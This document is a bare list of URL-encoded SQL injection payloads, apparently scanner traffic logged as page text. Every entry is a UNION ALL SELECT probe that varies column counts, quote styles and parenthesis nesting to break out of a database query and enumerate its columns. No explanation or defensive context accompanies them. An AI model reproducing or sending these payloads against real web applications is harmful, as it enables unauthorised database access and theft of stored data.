-4056%27%29%29%20UNION%20ALL%20SELECT%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735--%20%20AND%20%28%28%27RmFd%27%3D%27RmFd -5849%27%29%29%20UNION%20ALL%20SELECT%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362--%20%20AND%20%28%28%27OkuI%27%3D%27OkuI -7657%27%29%29%20UNION%20ALL%20SELECT%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976%2C%204976--%20%20AND%20%28%28%27AfJe%27%3D%27AfJe -4498%27%29%29%20UNION%20ALL%20SELECT%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122%2C%209122--%20%20AND%20%28%28%27ItnP%27%3D%27ItnP -1408%27%29%29%20UNION%20ALL%20SELECT%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723%2C%209723--%20%20AND%20%28%28%27yGSN%27%3D%27yGSN -9009%27%29%29%20UNION%20ALL%20SELECT%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885%2C%207885--%20%20AND%20%28%28%27FWzb%27%3D%27FWzb -4856%27%29%29%20UNION%20ALL%20SELECT%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556--%20%20AND%20%28%28%27pCHP%27%3D%27pCHP -5983%27%29%29%20UNION%20ALL%20SELECT%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046--%20%20AND%20%28%28%27Wjbm%27%3D%27Wjbm -6233%27%29%29%20UNION%20ALL%20SELECT%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967--%20%20AND%20%28%28%27EwBA%27%3D%27EwBA -6491%27%29%29%29%20UNION%20ALL%20SELECT%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787%2C%207787--%20%20AND%20%28%28%28%27DwoD%27%3D%27DwoD -5136%27%29%29%29%20UNION%20ALL%20SELECT%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244--%20%20AND%20%28%28%28%27FAYb%27%3D%27FAYb -9868%27%29%29%29%20UNION%20ALL%20SELECT%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616%2C%209616--%20%20AND%20%28%28%28%27KGLD%27%3D%27KGLD -2205%27%29%29%29%20UNION%20ALL%20SELECT%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156%2C%205156--%20%20AND%20%28%28%28%27LnAz%27%3D%27LnAz -7833%27%29%29%29%20UNION%20ALL%20SELECT%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781%2C%209781--%20%20AND%20%28%28%28%27kzbM%27%3D%27kzbM -5548%27%29%29%29%20UNION%20ALL%20SELECT%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095%2C%206095--%20%20AND%20%28%28%28%27sEtH%27%3D%27sEtH -3771%27%29%29%29%20UNION%20ALL%20SELECT%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854%2C%201854--%20%20AND%20%28%28%28%27rDPV%27%3D%27rDPV -1346%27%29%29%29%20UNION%20ALL%20SELECT%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089--%20%20AND%20%28%28%28%27sSQs%27%3D%27sSQs -4303%27%29%29%29%20UNION%20ALL%20SELECT%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487--%20%20AND%20%28%28%28%27yRmy%27%3D%27yRmy -2865%27%29%29%29%20UNION%20ALL%20SELECT%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964--%20%20AND%20%28%28%28%27ZWEh%27%3D%27ZWEh -7590%27%20UNION%20ALL%20SELECT%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281%2C%209281--%20%20AND%20%27NHCh%27%3D%27NHCh -8659%27%20UNION%20ALL%20SELECT%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237--%20%20AND%20%27ZFvl%27%3D%27ZFvl -1677%27%20UNION%20ALL%20SELECT%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274--%20%20AND%20%27skCn%27%3D%27skCn -9507%27%20UNION%20ALL%20SELECT%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742--%20%20AND%20%27wrLQ%27%3D%27wrLQ -7392%27%20UNION%20ALL%20SELECT%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204%2C%208204--%20%20AND%20%27CLzr%27%3D%27CLzr -5412%27%20UNION%20ALL%20SELECT%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929--%20%20AND%20%27xopf%27%3D%27xopf -2113%27%20UNION%20ALL%20SELECT%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804--%20%20AND%20%27hvSg%27%3D%27hvSg -5272%27%20UNION%20ALL%20SELECT%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752--%20%20AND%20%27MtOk%27%3D%27MtOk -5461%27%20UNION%20ALL%20SELECT%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055--%20%20AND%20%27xFKn%27%3D%27xFKn -2831%27%20UNION%20ALL%20SELECT%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160%2C%208160--%20%20AND%20%27RApx%27%3D%27RApx -7237%27%29%20UNION%20ALL%20SELECT%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903--%20%20AND%20%28%27AMYL%27%20LIKE%20%27AMYL -4650%27%29%20UNION%20ALL%20SELECT%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871%2C%206871--%20%20AND%20%28%27XHaH%27%20LIKE%20%27XHaH -7585%27%29%20UNION%20ALL%20SELECT%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238%2C%205238--%20%20AND%20%28%27atiF%27%20LIKE%20%27atiF -3702%27%29%20UNION%20ALL%20SELECT%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405%2C%205405--%20%20AND%20%28%27bELy%27%20LIKE%20%27bELy -3891%27%29%20UNION%20ALL%20SELECT%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882%2C%202882--%20%20AND%20%28%27OCib%27%20LIKE%20%27OCib -8703%27%29%20UNION%20ALL%20SELECT%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040--%20%20AND%20%28%27fOeg%27%20LIKE%20%27fOeg -8750%27%29%20UNION%20ALL%20SELECT%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227%2C%202227--%20%20AND%20%28%27cbIE%27%20LIKE%20%27cbIE -9007%27%29%20UNION%20ALL%20SELECT%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091--%20%20AND%20%28%27NSeI%27%20LIKE%20%27NSeI -5989%27%29%20UNION%20ALL%20SELECT%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649%2C%204649--%20%20AND%20%28%27FMzo%27%20LIKE%20%27FMzo -6601%27%29%20UNION%20ALL%20SELECT%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119--%20%20AND%20%28%27hnUQ%27%20LIKE%20%27hnUQ -8541%27%29%29%20UNION%20ALL%20SELECT%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811%2C%204811--%20%20AND%20%28%28%27WGKX%27%20LIKE%20%27WGKX -6790%27%29%29%20UNION%20ALL%20SELECT%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034--%20%20AND%20%28%28%27wjyA%27%20LIKE%20%27wjyA -6829%27%29%29%20UNION%20ALL%20SELECT%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980--%20%20AND%20%28%28%27YNOn%27%20LIKE%20%27YNOn -2514%27%29%29%20UNION%20ALL%20SELECT%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118--%20%20AND%20%28%28%27skNO%27%20LIKE%20%27skNO -8067%27%29%29%20UNION%20ALL%20SELECT%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502%2C%204502--%20%20AND%20%28%28%27seHi%27%20LIKE%20%27seHi -1943%27%29%29%20UNION%20ALL%20SELECT%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255--%20%20AND%20%28%28%27vzEa%27%20LIKE%20%27vzEa -4201%27%29%29%20UNION%20ALL%20SELECT%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560%2C%207560--%20%20AND%20%28%28%27CloO%27%20LIKE%20%27CloO -3717%27%29%29%20UNION%20ALL%20SELECT%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121--%20%20AND%20%28%28%27PVlz%27%20LIKE%20%27PVlz -3836%27%29%29%20UNION%20ALL%20SELECT%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237%2C%209237--%20%20AND%20%28%28%27lnfc%27%20LIKE%20%27lnfc -5912%27%29%29%20UNION%20ALL%20SELECT%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367--%20%20AND%20%28%28%27tauy%27%20LIKE%20%27tauy -7396%27%29%29%29%20UNION%20ALL%20SELECT%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597--%20%20AND%20%28%28%28%27bbqL%27%20LIKE%20%27bbqL -2598%27%29%29%29%20UNION%20ALL%20SELECT%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481%2C%203481--%20%20AND%20%28%28%28%27UbuB%27%20LIKE%20%27UbuB -9571%27%29%29%29%20UNION%20ALL%20SELECT%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924%2C%205924--%20%20AND%20%28%28%28%27GejW%27%20LIKE%20%27GejW -5899%27%29%29%29%20UNION%20ALL%20SELECT%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715--%20%20AND%20%28%28%28%27ayWV%27%20LIKE%20%27ayWV -3085%27%29%29%29%20UNION%20ALL%20SELECT%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909--%20%20AND%20%28%28%28%27cEea%27%20LIKE%20%27cEea -7379%27%29%29%29%20UNION%20ALL%20SELECT%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916--%20%20AND%20%28%28%28%27lbpb%27%20LIKE%20%27lbpb -1165%27%29%29%29%20UNION%20ALL%20SELECT%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851--%20%20AND%20%28%28%28%27Npvs%27%20LIKE%20%27Npvs -1793%27%29%29%29%20UNION%20ALL%20SELECT%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786--%20%20AND%20%28%28%28%27iWSu%27%20LIKE%20%27iWSu -7652%27%29%29%29%20UNION%20ALL%20SELECT%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747--%20%20AND%20%28%28%28%27jpmu%27%20LIKE%20%27jpmu -5614%27%29%29%29%20UNION%20ALL%20SELECT%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195%2C%201195--%20%20AND%20%28%28%28%27bLyU%27%20LIKE%20%27bLyU -8729%27%20UNION%20ALL%20SELECT%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166--%20%20AND%20%27veIM%27%20LIKE%20%27veIM -1974%27%20UNION%20ALL%20SELECT%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613--%20%20AND%20%27OKLK%27%20LIKE%20%27OKLK -3629%27%20UNION%20ALL%20SELECT%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880%2C%201880--%20%20AND%20%27KoUd%27%20LIKE%20%27KoUd -1025%27%20UNION%20ALL%20SELECT%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913%2C%204913--%20%20AND%20%27LtmU%27%20LIKE%20%27LtmU -2087%27%20UNION%20ALL%20SELECT%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597--%20%20AND%20%27tjGR%27%20LIKE%20%27tjGR -4710%27%20UNION%20ALL%20SELECT%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951--%20%20AND%20%27zRey%27%20LIKE%20%27zRey -7106%27%20UNION%20ALL%20SELECT%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438%2C%203438--%20%20AND%20%27OvxZ%27%20LIKE%20%27OvxZ -7972%27%20UNION%20ALL%20SELECT%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786%2C%201786--%20%20AND%20%27OErQ%27%20LIKE%20%27OErQ -4305%27%20UNION%20ALL%20SELECT%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886--%20%20AND%20%27oTIN%27%20LIKE%20%27oTIN -9417%27%20UNION%20ALL%20SELECT%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030%2C%205030--%20%20AND%20%27brRm%27%20LIKE%20%27brRm -8448%22%29%20UNION%20ALL%20SELECT%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092--%20%20AND%20%28%22iOFP%22%3D%22iOFP -3694%22%29%20UNION%20ALL%20SELECT%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904--%20%20AND%20%28%22nnqq%22%3D%22nnqq -9109%22%29%20UNION%20ALL%20SELECT%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338--%20%20AND%20%28%22ZYNe%22%3D%22ZYNe -1569%22%29%20UNION%20ALL%20SELECT%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607%2C%209607--%20%20AND%20%28%22XkkO%22%3D%22XkkO 